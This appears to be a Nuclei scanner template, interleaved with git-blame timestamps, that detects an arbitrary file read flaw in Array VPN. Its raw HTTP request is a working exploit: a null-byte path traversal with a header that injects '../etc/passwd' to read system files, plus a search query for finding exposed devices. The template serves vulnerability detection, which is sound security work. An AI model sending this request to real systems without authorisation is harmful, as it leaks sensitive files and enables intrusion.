2024-05-23 12:59:44 +00:00
|
|
|
id: array-vpn-lfi
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Array VPN - Arbitrary File Reading Vulnerability
|
|
|
|
author: pussycat0x
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Array VPN Arbitrary File Reading Vulnerability
|
|
|
|
reference:
|
|
|
|
- https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
|
|
metadata:
|
|
|
|
fofa-query: product="Array-VPN"
|
|
|
|
tags: lfi,vpn,arrayvpn
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
|
|
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2024-05-27 16:36:07 +00:00
|
|
|
- type: word
|
2024-05-23 12:59:44 +00:00
|
|
|
part: body
|
2024-05-27 16:36:07 +00:00
|
|
|
words:
|
|
|
|
- "/prx/001/http/localh"
|
|
|
|
|
|
|
|
- type: regex
|
2024-05-23 12:59:44 +00:00
|
|
|
regex:
|
2024-05-27 16:36:07 +00:00
|
|
|
- "root:.*:0:0:"
|
2024-05-23 12:59:44 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2024-05-27 16:36:07 +00:00
|
|
|
- 401
|